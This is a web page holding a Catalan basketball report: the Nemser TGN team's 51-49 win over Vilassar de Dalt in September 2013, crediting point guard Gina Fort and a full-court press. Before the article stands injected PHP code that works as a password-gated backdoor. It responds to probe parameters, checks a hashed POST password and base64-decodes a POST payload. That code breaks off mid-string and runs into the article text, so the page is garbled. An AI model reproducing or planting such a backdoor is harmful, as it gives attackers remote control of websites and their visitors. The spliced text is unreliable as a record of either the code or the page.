function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Victòria del Nemser contra el Vilassar de Dalt (51-49) - Tgn Bàsquet Club -

Victòria del Nemser contra el Vilassar de Dalt (51-49)

Updated: setembre 14, 2013

En el debut al Torneig de Santa Tecla, el Nemser TGN Bàsquet va vèncer el Vilassar de Dalt en el partit que tancava la segona jornada del campionat. L’equip lila va haver de remuntar un marcador advers(11-18 al final del primer període) perquè les visitants (que militen en l’altre grup de la primera catalana) van sortir molt fortes, aprofitant les nombroses passades perdudes de les locals i la seva superioritat en alçada dins la zona. El Vilassar jugava amb molta comoditat en atac i trobava fàcilment la cistella rival. Amb tot, la presència de Gina Fort en la posició de base va ser clau. La petita jugadora del Nemser TGN Bàsquet va donar un ritme diabòlic a l’equip i mai va poder ser aturada per les seves rivals (27-27 al descans). La velocitat i clarividència de Fort van tenir el reforç del canvi defensiu plantejat per Juan Carlos Arjona, amb una defensa pressionant a tota la pista que el Vilassar va tenir moltes dificultats per superar. Així, la superior alçada de les jugadores visitants no es va poder aprofitar perquè el ritme de joc era imposat pel TGN, que obligava al seu rival a jugar a tota la pista i molts pocs minuts en estàtic (no podien jugar pilotes al pal baix). Al final, un bon final quart període va donar un avantatge suficient a les locals que van veure retallada la seva diferència en l’últim minut i mig per l’esforç del Vilassar.